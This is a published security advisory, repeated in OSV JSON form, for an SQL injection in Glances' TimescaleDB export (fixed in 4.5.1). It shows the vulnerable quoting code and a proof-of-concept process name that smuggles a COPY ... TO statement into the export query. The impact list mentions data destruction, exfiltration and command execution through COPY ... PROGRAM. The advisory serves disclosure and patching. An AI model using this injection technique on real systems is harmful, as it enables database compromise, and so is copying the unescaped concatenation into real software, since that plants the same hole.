GHSA-X46R-MF5G-XPR6

Vulnerability from github – Published: 2026-03-09 19:51 – Updated: 2026-03-10 18:44
VLAI?
Summary
Glances has SQL Injection via Process Names in TimescaleDB Export
Details

Summary

The TimescaleDB export module constructs SQL queries using string concatenation with unsanitized system monitoring data. The normalize() method wraps string values in single quotes but does not escape embedded single quotes, making SQL injection trivial via attacker-controlled data such as process names, filesystem mount points, network interface names, or container names.

Root Cause: The normalize() function uses f"'{value}'" for string values without escaping single quotes within the value. The resulting strings are concatenated into INSERT queries via string formatting and executed directly with cur.execute() — no parameterized queries are used.

Affected Code

  • File: glances/exports/glances_timescaledb/__init__.py, lines 79-93 (normalize function)
def normalize(self, value):
    """Normalize the value to be exportable to TimescaleDB."""
    if value is None:
        return 'NULL'
    if isinstance(value, bool):
        return str(value).upper()
    if isinstance(value, (list, tuple)):
        # Special case for list of one boolean
        if len(value) == 1 and isinstance(value[0], bool):
            return str(value[0]).upper()
        return ', '.join([f"'{v}'" for v in value])
    if isinstance(value, str):
        return f"'{value}'"  # <-- NO ESCAPING of single quotes within value

    return f"{value}"
  • File: glances/exports/glances_timescaledb/__init__.py, lines 201-205 (query construction)
# Insert the data
insert_list = [f"({','.join(i)})" for i in values_list]
insert_query = f"INSERT INTO {plugin} VALUES {','.join(insert_list)};"
logger.debug(f"Insert data into table: {insert_query}")
try:
    cur.execute(insert_query)  # <-- Direct execution of concatenated SQL

PoC

  • As a normal user, create a process with the name containing the SQL Injection payload:
exec -a "x'); COPY (SELECT version()) TO '/tmp/sqli_proof.txt' --"   python3 -c 'import time; [sum(range(500000)) or time.sleep(0.01) for _ in iter(int, 1)]'
  • Start Glances with TimescaleDB export as root user:
glances --export timescaledb --export-process-filter ".*" --time 5 --stdout cpu
  • Observe that sqli_proof.txt is created in /tmp directory.

Impact

  • Data Destruction: DROP TABLE, DELETE, TRUNCATE operations against the TimescaleDB database.
  • Data Exfiltration: Using COPY ... TO or subqueries to extract data from other tables.
  • Potential RCE: Via PostgreSQL extensions like COPY ... PROGRAM which executes OS commands.
  • Privilege Escalation: Any local user who can create a process with a crafted name can inject SQL into the database, potentially compromising the entire PostgreSQL instance.
Severity ?
7.3 (High)
CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "Glances"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.5.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-30930"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-89"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-09T19:51:35Z",
    "nvd_published_at": "2026-03-10T18:18:52Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nThe TimescaleDB export module constructs SQL queries using string concatenation with unsanitized system monitoring data. The normalize() method wraps string values in single quotes but does not escape embedded single quotes, making SQL injection trivial via attacker-controlled data such as process names, filesystem mount points, network interface names, or container names.\n\nRoot Cause: The normalize() function uses f\"\u0027{value}\u0027\" for string values without escaping single quotes within the value. The resulting strings are concatenated into INSERT queries via string formatting and executed directly with cur.execute() \u2014 no parameterized queries are used.\n\n#### Affected Code\n- _File: glances/exports/glances_timescaledb/__init__.py, lines 79-93 (normalize function)_\n```\ndef normalize(self, value):\n    \"\"\"Normalize the value to be exportable to TimescaleDB.\"\"\"\n    if value is None:\n        return \u0027NULL\u0027\n    if isinstance(value, bool):\n        return str(value).upper()\n    if isinstance(value, (list, tuple)):\n        # Special case for list of one boolean\n        if len(value) == 1 and isinstance(value[0], bool):\n            return str(value[0]).upper()\n        return \u0027, \u0027.join([f\"\u0027{v}\u0027\" for v in value])\n    if isinstance(value, str):\n        return f\"\u0027{value}\u0027\"  # \u003c-- NO ESCAPING of single quotes within value\n\n    return f\"{value}\"\n```\n\n- _File: glances/exports/glances_timescaledb/__init__.py, lines 201-205 (query construction)_\n```\n# Insert the data\ninsert_list = [f\"({\u0027,\u0027.join(i)})\" for i in values_list]\ninsert_query = f\"INSERT INTO {plugin} VALUES {\u0027,\u0027.join(insert_list)};\"\nlogger.debug(f\"Insert data into table: {insert_query}\")\ntry:\n    cur.execute(insert_query)  # \u003c-- Direct execution of concatenated SQL\n```\n\n### PoC\n- As a normal user, create a process with the name containing the SQL Injection payload:\n```\nexec -a \"x\u0027); COPY (SELECT version()) TO \u0027/tmp/sqli_proof.txt\u0027 --\"   python3 -c \u0027import time; [sum(range(500000)) or time.sleep(0.01) for _ in iter(int, 1)]\u0027\n```\n- Start Glances with TimescaleDB export as root user:\n```\nglances --export timescaledb --export-process-filter \".*\" --time 5 --stdout cpu\n```\n- Observe that sqli_proof.txt is created in /tmp directory.\n\n### Impact\n\n- Data Destruction: DROP TABLE, DELETE, TRUNCATE operations against the TimescaleDB database.\n- Data Exfiltration: Using COPY ... TO or subqueries to extract data from other tables.\n- Potential RCE: Via PostgreSQL extensions like COPY ... PROGRAM which executes OS commands.\n- Privilege Escalation: Any local user who can create a process with a crafted name can inject SQL into the database, potentially compromising the entire PostgreSQL instance.",
  "id": "GHSA-x46r-mf5g-xpr6",
  "modified": "2026-03-10T18:44:40Z",
  "published": "2026-03-09T19:51:35Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nicolargo/glances/security/advisories/GHSA-x46r-mf5g-xpr6"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30930"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nicolargo/glances/commit/39161f0d6fd723d83f534b48f24cdca722573336"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nicolargo/glances"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nicolargo/glances/releases/tag/v4.5.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Glances has SQL Injection via Process Names in TimescaleDB Export"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.